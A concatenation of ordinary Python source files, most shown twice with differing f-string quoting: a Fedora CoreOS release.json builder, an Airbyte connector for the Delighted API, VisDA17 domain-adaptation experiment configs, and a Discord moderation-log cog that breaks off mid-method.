'subclasses': ['1_1', '1_2'], 'missedMonthsSinceLatestTransaction': 0} if __name__ == '__main__': data = build_data('S', example_stream) plot_bar(data) print(data) app.run_server(debug=True)
#!/usr/bin/env python3 from argparse import ArgumentParser, FileType from datetime import datetime import json import os def ensure_dup(inp, out, inp_key, out_key): ''' If the out dictionary does not contain a value for out_key update it to be equal to the inp dictionaries inp_key value, if it does exist ensure the values are equal between the two dictionaries ''' if out.get(out_key, None) == None: out[out_key] = inp.get(inp_key) if out.get(out_key) != inp.get(inp_key): raise Exception("Input Files do not appear to be for the same release") def url_builder(stream, version, arch, path): return f"https://builds.coreos.fedoraproject.org/prod/streams/{stream}/builds/{version}/{arch}/{path}" def get_extension(path, modifier, arch): return path.rsplit(f'{modifier}.{arch}')[1][1:] parser = ArgumentParser() parser.add_argument("--workdir", help="cosa workdir", required=True) parser.add_argument("--build-id", help="build id", required=False) args = parser.parse_args() arches = [] with open(os.path.join(args.workdir, "builds", "builds.json"), 'r') as build_file: build_json = json.load(build_file) if len(build_json.get('builds', [])) > 0: individual_build = {} if args.build_id is None: individual_build = build_json.get('builds')[0] args.build_id = individual_build.get('id') else: for build in build_json.get('builds'): if build.get('id') == args.build_id: individual_build = build break print(f"Creating release.json for build {individual_build["id"]} ") arches = individual_build.get('arches') outer_dir = os.path.join(args.workdir, "builds", args.build_id) release_file = os.path.join(outer_dir, "release.json") out = {} if os.path.exists(release_file): with open(release_file, 'r') as w: out = json.load(w) print(f"Using existing release file {release_file}") files = [os.path.join(outer_dir, arch, "meta.json") for arch in arches] for f in files: with open(f, 'r') as w: input_ = json.load(w) arch = input_.get("coreos-assembler.basearch") ensure_dup(input_, out, "buildid", "release") ensure_dup(input_.get('coreos-assembler.container-config-git'), out, 'branch', 'stream') def artifact(i): base_url = url_builder(out.get('stream'), out.get('release'), arch, i.get('path')) return { "location": base_url, "signature": "{}.sig".format(base_url), "sha256": i.get("sha256") } print(f"{out["stream"]} stream") print(f" {arch} images:") # build the architectures dict arch_dict = {"media": {}} ensure_dup(input_, arch_dict, "ostree-commit", "commit") generic_arches = ["aliyun", "aws", "azure", "qemu", "metal", "openstack", "vmware", "gcp"] for ga in generic_arches: if input_.get("images", {}).get(ga, None) is not None: print(f" - {ga}") i = input_.get("images").get(ga) ext = get_extension(i.get('path'), ga, arch) arch_dict['media'][ga] = { "artifacts": { ext: { "disk": artifact(i) } } } # AMI specific additions if input_.get("amis", None) is not None: arch_dict["media"]["aws"] = arch_dict["media"].get("aws", {}) arch_dict["media"]["aws"]["images"] = arch_dict["media"]["aws"].get("images", {}) for ami_dict in input_.get("amis"): arch_dict["media"]["aws"]["images"][ami_dict["name"]] = { "image": ami_dict["hvm"] } # metal specific additions arch_dict["media"]["metal"] = arch_dict["media"].get("metal", {}) arch_dict["media"]["metal"]["artifacts"] = arch_dict["media"]["metal"].get("artifacts", {}) i = input_.get("images", {}).get("iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["installer.iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("kernel", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["initramfs"] = artifact(i) i = input_.get("images", {}).get("live-iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("live-kernel", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("live-initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["initramfs"] = artifact(i) # if architectures as a whole or the individual arch is empty just push our changes if out.get('architectures', None) is None or out['architectures'].get(arch, None) is None: oa = out.get('architectures', {}) oa[arch] = arch_dict out['architectures'] = oa # else check media warning if key present, appending if not else: out_arch = out['architectures'][arch] for media_type, val in arch_dict.get('media').items(): if media_type not in out_arch['media']: out['architectures'][arch]['media'].update({media_type: val}) elif val == out_arch['media'][media_type]: continue else: raise Exception("differing content detected for media type '{}'".format(media_type)) with open(release_file, 'w') as w: json.dump(out, w) print(f"Successfully wrote release file at {release_file}")
#!/usr/bin/env python3 from argparse import ArgumentParser, FileType from datetime import datetime import json import os def ensure_dup(inp, out, inp_key, out_key): ''' If the out dictionary does not contain a value for out_key update it to be equal to the inp dictionaries inp_key value, if it does exist ensure the values are equal between the two dictionaries ''' if out.get(out_key, None) == None: out[out_key] = inp.get(inp_key) if out.get(out_key) != inp.get(inp_key): raise Exception("Input Files do not appear to be for the same release") def url_builder(stream, version, arch, path): return f"https://builds.coreos.fedoraproject.org/prod/streams/{stream}/builds/{version}/{arch}/{path}" def get_extension(path, modifier, arch): return path.rsplit(f'{modifier}.{arch}')[1][1:] parser = ArgumentParser() parser.add_argument("--workdir", help="cosa workdir", required=True) parser.add_argument("--build-id", help="build id", required=False) args = parser.parse_args() arches = [] with open(os.path.join(args.workdir, "builds", "builds.json"), 'r') as build_file: build_json = json.load(build_file) if len(build_json.get('builds', [])) > 0: individual_build = {} if args.build_id is None: individual_build = build_json.get('builds')[0] args.build_id = individual_build.get('id') else: for build in build_json.get('builds'): if build.get('id') == args.build_id: individual_build = build break print(f"Creating release.json for build {individual_build['id']} ") arches = individual_build.get('arches') outer_dir = os.path.join(args.workdir, "builds", args.build_id) release_file = os.path.join(outer_dir, "release.json") out = {} if os.path.exists(release_file): with open(release_file, 'r') as w: out = json.load(w) print(f"Using existing release file {release_file}") files = [os.path.join(outer_dir, arch, "meta.json") for arch in arches] for f in files: with open(f, 'r') as w: input_ = json.load(w) arch = input_.get("coreos-assembler.basearch") ensure_dup(input_, out, "buildid", "release") ensure_dup(input_.get('coreos-assembler.container-config-git'), out, 'branch', 'stream') def artifact(i): base_url = url_builder(out.get('stream'), out.get('release'), arch, i.get('path')) return { "location": base_url, "signature": "{}.sig".format(base_url), "sha256": i.get("sha256") } print(f"{out['stream']} stream") print(f" {arch} images:") # build the architectures dict arch_dict = {"media": {}} ensure_dup(input_, arch_dict, "ostree-commit", "commit") generic_arches = ["aliyun", "aws", "azure", "qemu", "metal", "openstack", "vmware", "gcp"] for ga in generic_arches: if input_.get("images", {}).get(ga, None) is not None: print(f" - {ga}") i = input_.get("images").get(ga) ext = get_extension(i.get('path'), ga, arch) arch_dict['media'][ga] = { "artifacts": { ext: { "disk": artifact(i) } } } # AMI specific additions if input_.get("amis", None) is not None: arch_dict["media"]["aws"] = arch_dict["media"].get("aws", {}) arch_dict["media"]["aws"]["images"] = arch_dict["media"]["aws"].get("images", {}) for ami_dict in input_.get("amis"): arch_dict["media"]["aws"]["images"][ami_dict["name"]] = { "image": ami_dict["hvm"] } # metal specific additions arch_dict["media"]["metal"] = arch_dict["media"].get("metal", {}) arch_dict["media"]["metal"]["artifacts"] = arch_dict["media"]["metal"].get("artifacts", {}) i = input_.get("images", {}).get("iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["installer.iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("kernel", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["initramfs"] = artifact(i) i = input_.get("images", {}).get("live-iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("live-kernel", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("live-initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["initramfs"] = artifact(i) # if architectures as a whole or the individual arch is empty just push our changes if out.get('architectures', None) is None or out['architectures'].get(arch, None) is None: oa = out.get('architectures', {}) oa[arch] = arch_dict out['architectures'] = oa # else check media warning if key present, appending if not else: out_arch = out['architectures'][arch] for media_type, val in arch_dict.get('media').items(): if media_type not in out_arch['media']: out['architectures'][arch]['media'].update({media_type: val}) elif val == out_arch['media'][media_type]: continue else: raise Exception("differing content detected for media type '{}'".format(media_type)) with open(release_file, 'w') as w: json.dump(out, w) print(f"Successfully wrote release file at {release_file}")
# # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # import base64 from abc import ABC from typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Tuple from urllib.parse import parse_qsl, urlparse import requests from airbyte_cdk.models import SyncMode from airbyte_cdk.sources import AbstractSource from airbyte_cdk.sources.streams import Stream from airbyte_cdk.sources.streams.http import HttpStream from airbyte_cdk.sources.streams.http.auth import TokenAuthenticator # Basic full refresh stream class DelightedStream(HttpStream, ABC): url_base = "https://api.delighted.com/v1/" # Page size limit = 100 page = 1 # Define primary key to all streams as primary key primary_key = "id" def __init__(self, since: int, **kwargs): super().__init__(**kwargs) self.since = since def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: response_data = response.json() if len(response_data) == self.limit: self.page += 1 return {"page": self.page} def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None ) -> MutableMapping[str, Any]: params = {"per_page": self.limit, "since": self.since} if next_page_token: params.update(**next_page_token) return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: yield from response.json() class IncrementalDelightedStream(DelightedStream, ABC): # Getting page size as 'limit' from parent class @property def limit(self): return super().limit state_checkpoint_interval = limit @property def cursor_field(self) -> str: return "created_at" def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]: return {self.cursor_field: max(latest_record.get(self.cursor_field, 0), current_stream_state.get(self.cursor_field, 0))} def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if stream_state: params["since"] = stream_state.get(self.cursor_field) return params def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]: for record in super().parse_response(response=response, stream_state=stream_state, **kwargs): if self.cursor_field not in stream_state or record[self.cursor_field] > stream_state[self.cursor_field]: yield record class People(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-people """ def path(self, **kwargs) -> str: return "people.json" def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: # Getting next page link next_page = response.links.get("next", None) if next_page: return {"page_info": dict(parse_qsl(urlparse(next_page.get("url")).query)).get("page_info")} class Unsubscribes(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-unsubscribed-people """ cursor_field = "unsubscribed_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "unsubscribes.json" class Bounces(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-bounced-people """ cursor_field = "bounced_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "bounces.json" class SurveyResponses(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-survey-responses """ cursor_field = "updated_at" def path(self, **kwargs) -> str: return "survey_responses.json" def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if "since" in params: params["updated_since"] = params.pop("since") if stream_state: params["updated_since"] = stream_state.get(self.cursor_field) return params # Source class SourceDelighted(AbstractSource): def _get_authenticator(self, config): token = base64.b64encode(f"{config["api_key"]}:".encode("utf-8")).decode("utf-8") return TokenAuthenticator(token=token, auth_method="Basic") def check_connection(self, logger, config) -> Tuple[bool, any]: """ Testing connection availability for the connector. :param config: the user-input config object conforming to the connector's spec.json :param logger: logger object :return Tuple[bool, any]: (True, None) if the input config can be used to connect to the API successfully, (False, error) otherwise. """ try: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} stream = SurveyResponses(**args) records = stream.read_records(sync_mode=SyncMode.full_refresh) next(records) return True, None except Exception as e: return False, e def streams(self, config: Mapping[str, Any]) -> List[Stream]: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} return [ Bounces(**args), People(**args), SurveyResponses(**args), Unsubscribes(**args), ]
# # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # import base64 from abc import ABC from typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Tuple from urllib.parse import parse_qsl, urlparse import requests from airbyte_cdk.models import SyncMode from airbyte_cdk.sources import AbstractSource from airbyte_cdk.sources.streams import Stream from airbyte_cdk.sources.streams.http import HttpStream from airbyte_cdk.sources.streams.http.auth import TokenAuthenticator # Basic full refresh stream class DelightedStream(HttpStream, ABC): url_base = "https://api.delighted.com/v1/" # Page size limit = 100 page = 1 # Define primary key to all streams as primary key primary_key = "id" def __init__(self, since: int, **kwargs): super().__init__(**kwargs) self.since = since def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: response_data = response.json() if len(response_data) == self.limit: self.page += 1 return {"page": self.page} def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None ) -> MutableMapping[str, Any]: params = {"per_page": self.limit, "since": self.since} if next_page_token: params.update(**next_page_token) return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: yield from response.json() class IncrementalDelightedStream(DelightedStream, ABC): # Getting page size as 'limit' from parent class @property def limit(self): return super().limit state_checkpoint_interval = limit @property def cursor_field(self) -> str: return "created_at" def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]: return {self.cursor_field: max(latest_record.get(self.cursor_field, 0), current_stream_state.get(self.cursor_field, 0))} def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if stream_state: params["since"] = stream_state.get(self.cursor_field) return params def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]: for record in super().parse_response(response=response, stream_state=stream_state, **kwargs): if self.cursor_field not in stream_state or record[self.cursor_field] > stream_state[self.cursor_field]: yield record class People(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-people """ def path(self, **kwargs) -> str: return "people.json" def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: # Getting next page link next_page = response.links.get("next", None) if next_page: return {"page_info": dict(parse_qsl(urlparse(next_page.get("url")).query)).get("page_info")} class Unsubscribes(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-unsubscribed-people """ cursor_field = "unsubscribed_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "unsubscribes.json" class Bounces(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-bounced-people """ cursor_field = "bounced_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "bounces.json" class SurveyResponses(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-survey-responses """ cursor_field = "updated_at" def path(self, **kwargs) -> str: return "survey_responses.json" def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if "since" in params: params["updated_since"] = params.pop("since") if stream_state: params["updated_since"] = stream_state.get(self.cursor_field) return params # Source class SourceDelighted(AbstractSource): def _get_authenticator(self, config): token = base64.b64encode(f"{config['api_key']}:".encode("utf-8")).decode("utf-8") return TokenAuthenticator(token=token, auth_method="Basic") def check_connection(self, logger, config) -> Tuple[bool, any]: """ Testing connection availability for the connector. :param config: the user-input config object conforming to the connector's spec.json :param logger: logger object :return Tuple[bool, any]: (True, None) if the input config can be used to connect to the API successfully, (False, error) otherwise. """ try: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} stream = SurveyResponses(**args) records = stream.read_records(sync_mode=SyncMode.full_refresh) next(records) return True, None except Exception as e: return False, e def streams(self, config: Mapping[str, Any]) -> List[Stream]: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} return [ Bounces(**args), People(**args), SurveyResponses(**args), Unsubscribes(**args), ]
"""Configs for VisDA17 experiments.""" def get_weighting_config_class_pareto(alpha, reverse, seed): return { 'name': 'class_pareto', 'kwargs': { 'alpha': alpha, 'reverse': reverse, 'seed': seed }, } def get_dataset_config_visda17_pareto_target_imbalance(alpha, seed=None): return { 'name': 'VisDA17', 'val_fraction': 0.15, 'mods': [], 'source': { 'index': 0, 'weighting': { 'name': 'class_uniform', 'kwargs': dict(), }, 'subsample': True, }, 'target': { 'index': 1, 'weighting': get_weighting_config_class_pareto(alpha, True, seed=seed), 'subsample': True, }, } def get_algorithm_config(algorithm, extra_hparams=None, extra_discriminator_hparams=None): # Common configs of all algorithms config = { 'name': algorithm, 'hparams': { 'da_network': { 'feature_extractor': { 'name': 'ResNet', 'hparams': { 'feature_dim': 256, 'pretrained': True, 'freeze_bn': False, 'resnet18': False, 'resnet_dropout': 0.0, 'fc_lr_factor': 1.0, 'fc_wd_factor': 1.0, } }, 'classifier': { 'name': 'LogLossClassifier', 'hparams': { 'num_hidden': None, 'special_init': True, } }, }, 'discriminator': { 'hparams': { 'num_hidden': 1024, 'depth': 3, 'spectral': False, 'history_size': 0, } }, 'ema_momentum': None, 'fx_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.001, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'fx_lr_decay_start': 0, 'fx_lr_decay_steps': 50000, 'fx_lr_decay_factor': 0.05, 'cls_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.01, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'cls_weight': 1.0, 'cls_trg_weight': 0.0, 'alignment_weight': None, 'alignment_w_steps': 10000, 'disc_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.005, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'disc_steps': 1, 'l2_weight': 0.0, } } if extra_hparams is not None: config['hparams'].update(extra_hparams) if extra_discriminator_hparams is not None: config['hparams']['discriminator']['hparams'].update(extra_discriminator_hparams) return config def register_experiments(registry): # Algorithm configs format: # nickname, algorithm_name, extra_hparams, extra_discriminator_hparams algorithms = [ ('source_only', 'ERM', None, None), ('dann_zero', 'DANN_NS', {'alignment_weight': 0.0}, None), ('dann', 'DANN_NS', {'alignment_weight': 0.1}, None), ] iwdan_extra_hparams = {'alignment_weight': 0.1, 'iw_update_period': 4000, 'importance_weighting': {'ma': 0.5}} algorithms.extend([ ('iwdan', 'IWDAN', iwdan_extra_hparams, None), ('iwcdan', 'IWCDAN', iwdan_extra_hparams, None), ]) algorithms.append( (f'sdann_4', 'SDANN', {'alignment_weight': 0.1}, {'beta': 4.0}) ) algorithms.extend([ ('asa_abs', 'DANN_SUPP_ABS', {'alignment_weight': 0.1}, {'history_size': 1000}), ('asa_sq', 'DANN_SUPP_SQ', {'alignment_weight': 0.1}, {'history_size': 1000}), ]) for imbalance_alpha in [0.0, 1.0, 1.5, 2.0]: for seed in range(1, 6): dataset_config = get_dataset_config_visda17_pareto_target_imbalance(imbalance_alpha, seed=seed) training_config = { 'seed': seed, 'num_steps': 50000, 'batch_size': 36, 'num_workers': 4, 'eval_period': 2500, 'log_period': 50, 'eval_bn_update': True, 'save_model': False, 'save_period': 1, 'disc_eval_period': 4, } for alg_nickname, algorithm_name, extra_hparams, extra_discriminator_hparams in algorithms: algorithm_config = get_algorithm_config(algorithm_name, extra_hparams, extra_discriminator_hparams) experiment_name = f'visda17/resnet50/seed_{seed}/s_alpha_{int(imbalance_alpha * 10):02d}/{alg_nickname}' experiment_config = { 'dataset': dataset_config, 'algorithm': algorithm_config, 'training': training_config, } registry.register(experiment_name, experiment_config)
"""Configs for VisDA17 experiments.""" def get_weighting_config_class_pareto(alpha, reverse, seed): return { 'name': 'class_pareto', 'kwargs': { 'alpha': alpha, 'reverse': reverse, 'seed': seed }, } def get_dataset_config_visda17_pareto_target_imbalance(alpha, seed=None): return { 'name': 'VisDA17', 'val_fraction': 0.15, 'mods': [], 'source': { 'index': 0, 'weighting': { 'name': 'class_uniform', 'kwargs': dict(), }, 'subsample': True, }, 'target': { 'index': 1, 'weighting': get_weighting_config_class_pareto(alpha, True, seed=seed), 'subsample': True, }, } def get_algorithm_config(algorithm, extra_hparams=None, extra_discriminator_hparams=None): # Common configs of all algorithms config = { 'name': algorithm, 'hparams': { 'da_network': { 'feature_extractor': { 'name': 'ResNet', 'hparams': { 'feature_dim': 256, 'pretrained': True, 'freeze_bn': False, 'resnet18': False, 'resnet_dropout': 0.0, 'fc_lr_factor': 1.0, 'fc_wd_factor': 1.0, } }, 'classifier': { 'name': 'LogLossClassifier', 'hparams': { 'num_hidden': None, 'special_init': True, } }, }, 'discriminator': { 'hparams': { 'num_hidden': 1024, 'depth': 3, 'spectral': False, 'history_size': 0, } }, 'ema_momentum': None, 'fx_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.001, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'fx_lr_decay_start': 0, 'fx_lr_decay_steps': 50000, 'fx_lr_decay_factor': 0.05, 'cls_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.01, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'cls_weight': 1.0, 'cls_trg_weight': 0.0, 'alignment_weight': None, 'alignment_w_steps': 10000, 'disc_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.005, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'disc_steps': 1, 'l2_weight': 0.0, } } if extra_hparams is not None: config['hparams'].update(extra_hparams) if extra_discriminator_hparams is not None: config['hparams']['discriminator']['hparams'].update(extra_discriminator_hparams) return config def register_experiments(registry): # Algorithm configs format: # nickname, algorithm_name, extra_hparams, extra_discriminator_hparams algorithms = [ ('source_only', 'ERM', None, None), ('dann_zero', 'DANN_NS', {'alignment_weight': 0.0}, None), ('dann', 'DANN_NS', {'alignment_weight': 0.1}, None), ] iwdan_extra_hparams = {'alignment_weight': 0.1, 'iw_update_period': 4000, 'importance_weighting': {'ma': 0.5}} algorithms.extend([ ('iwdan', 'IWDAN', iwdan_extra_hparams, None), ('iwcdan', 'IWCDAN', iwdan_extra_hparams, None), ]) algorithms.append( (f'sdann_4', 'SDANN', {'alignment_weight': 0.1}, {'beta': 4.0}) ) algorithms.extend([ ('asa_abs', 'DANN_SUPP_ABS', {'alignment_weight': 0.1}, {'history_size': 1000}), ('asa_sq', 'DANN_SUPP_SQ', {'alignment_weight': 0.1}, {'history_size': 1000}), ]) for imbalance_alpha in [0.0, 1.0, 1.5, 2.0]: for seed in range(1, 6): dataset_config = get_dataset_config_visda17_pareto_target_imbalance(imbalance_alpha, seed=seed) training_config = { 'seed': seed, 'num_steps': 50000, 'batch_size': 36, 'num_workers': 4, 'eval_period': 2500, 'log_period': 50, 'eval_bn_update': True, 'save_model': False, 'save_period': 1, 'disc_eval_period': 4, } for alg_nickname, algorithm_name, extra_hparams, extra_discriminator_hparams in algorithms: algorithm_config = get_algorithm_config(algorithm_name, extra_hparams, extra_discriminator_hparams) experiment_name = f'visda17/resnet50/seed_{seed}/s_alpha_{int(imbalance_alpha * 10):02d}/{alg_nickname}' experiment_config = { 'dataset': dataset_config, 'algorithm': algorithm_config, 'training': training_config, } registry.register(experiment_name, experiment_config)
import asyncio import difflib import itertools import typing as t from datetime import datetime, timezone from itertools import zip_longest import discord from dateutil.relativedelta import relativedelta from deepdiff import DeepDiff from discord import Colour, Message, Thread from discord.abc import GuildChannel from discord.ext.commands import Cog, Context from discord.utils import escape_markdown, format_dt, snowflake_time from bot.bot import Bot from bot.constants import Categories, Channels, Colours, Emojis, Event, Guild as GuildConstant, Icons, Roles, URLs from bot.log import get_logger from bot.utils import time from bot.utils.messages import format_user log = get_logger(__name__) GUILD_CHANNEL = t.Union[discord.CategoryChannel, discord.TextChannel, discord.VoiceChannel] CHANNEL_CHANGES_UNSUPPORTED = ("permissions",) CHANNEL_CHANGES_SUPPRESSED = ("_overwrites", "position") ROLE_CHANGES_UNSUPPORTED = ("colour", "permissions") VOICE_STATE_ATTRIBUTES = { "channel.name": "Channel", "self_stream": "Streaming", "self_video": "Broadcasting", } class ModLog(Cog, name="ModLog"): """Logging for server events and staff actions.""" def __init__(self, bot: Bot): self.bot = bot self._ignored = {event: [] for event in Event} self._cached_edits = [] async def upload_log( self, messages: t.Iterable[discord.Message], actor_id: int, attachments: t.Iterable[t.List[str]] = None ) -> str: """Upload message logs to the database and return a URL to a page for viewing the logs.""" if attachments is None: attachments = [] response = await self.bot.api_client.post( 'bot/deleted-messages', json={ 'actor': actor_id, 'creation': datetime.now(timezone.utc).isoformat(), 'deletedmessage_set': [ { 'id': message.id, 'author': message.author.id, 'channel_id': message.channel.id, 'content': message.content.replace("\0", ""), # Null chars cause 400. 'embeds': [embed.to_dict() for embed in message.embeds], 'attachments': attachment, } for message, attachment in zip_longest(messages, attachments, fillvalue=[]) ] } ) return f"{URLs.site_logs_view}/{response["id"]}" def ignore(self, event: Event, *items: int) -> None: """Add event to ignored events to suppress log emission.""" for item in items: if item not in self._ignored[event]: self._ignored[event].append(item) async def send_log_message( self, icon_url: t.Optional[str], colour: t.Union[discord.Colour, int], title: t.Optional[str], text: str, thumbnail: t.Optional[t.Union[str, discord.Asset]] = None, channel_id: int = Channels.mod_log, ping_everyone: bool = False, files: t.Optional[t.List[discord.File]] = None, content: t.Optional[str] = None, additional_embeds: t.Optional[t.List[discord.Embed]] = None, timestamp_override: t.Optional[datetime] = None, footer: t.Optional[str] = None, ) -> Context: """Generate log embed and send to logging channel.""" await self.bot.wait_until_guild_available() # Truncate string directly here to avoid removing newlines embed = discord.Embed( description=text[:4093] + "..." if len(text) > 4096 else text ) if title and icon_url: embed.set_author(name=title, icon_url=icon_url) embed.colour = colour embed.timestamp = timestamp_override or datetime.utcnow() if footer: embed.set_footer(text=footer) if thumbnail: embed.set_thumbnail(url=thumbnail) if ping_everyone: if content: content = f"<@&{Roles.moderators}> {content}" else: content = f"<@&{Roles.moderators}>" # Truncate content to 2000 characters and append an ellipsis. if content and len(content) > 2000: content = content[:2000 - 3] + "..." channel = self.bot.get_channel(channel_id) log_message = await channel.send( content=content, embed=embed, files=files ) if additional_embeds: for additional_embed in additional_embeds: await channel.send(embed=additional_embed) return await self.bot.get_context(log_message) # Optionally return for use with antispam @Cog.listener() async def on_guild_channel_create(self, channel: GUILD_CHANNEL) -> None: """Log channel create event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category created" message = f"{channel.name} (`{channel.id}`)" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" else: title = "Text channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message(Icons.hash_green, Colours.soft_green, title, message) @Cog.listener() async def on_guild_channel_delete(self, channel: GUILD_CHANNEL) -> None: """Log channel delete event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category deleted" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel deleted" else: title = "Text channel deleted" if channel.category and not isinstance(channel, discord.CategoryChannel): message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message( Icons.hash_red, Colours.soft_red, title, message ) @Cog.listener() async def on_guild_channel_update(self, before: GUILD_CHANNEL, after: GuildChannel) -> None: """Log channel update event to mod log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.guild_channel_update]: self._ignored[Event.guild_channel_update].remove(before.id) return # Two channel updates are sent for a single edit: 1 for topic and 1 for category change. # TODO: remove once support is added for ignoring multiple occurrences for the same channel. help_categories = (Categories.help_available, Categories.help_dormant, Categories.help_in_use) if after.category and after.category.id in help_categories: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key in CHANNEL_CHANGES_SUPPRESSED: continue if key in CHANNEL_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] # Discord does not treat consecutive backticks ("``") as an empty inline code block, so the markdown # formatting is broken when `new` and/or `old` are empty values. "None" is used for these cases so # formatting is preserved. changes.append(f"**{key.title()}:** `{old or "None"}` **→** `{new or "None"}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" if after.category: message = f"**{after.category}/#{after.name} (`{after.id}`)**\n{message}" else: message = f"**#{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Channel updated", message ) @Cog.listener() async def on_guild_role_create(self, role: discord.Role) -> None: """Log role create event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_green, Colours.soft_green, "Role created", f"`{role.id}`" ) @Cog.listener() async def on_guild_role_delete(self, role: discord.Role) -> None: """Log role delete event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_red, Colours.soft_red, "Role removed", f"{role.name} (`{role.id}`)" ) @Cog.listener() async def on_guild_role_update(self, before: discord.Role, after: discord.Role) -> None: """Log role update event to mod log.""" if before.guild.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # 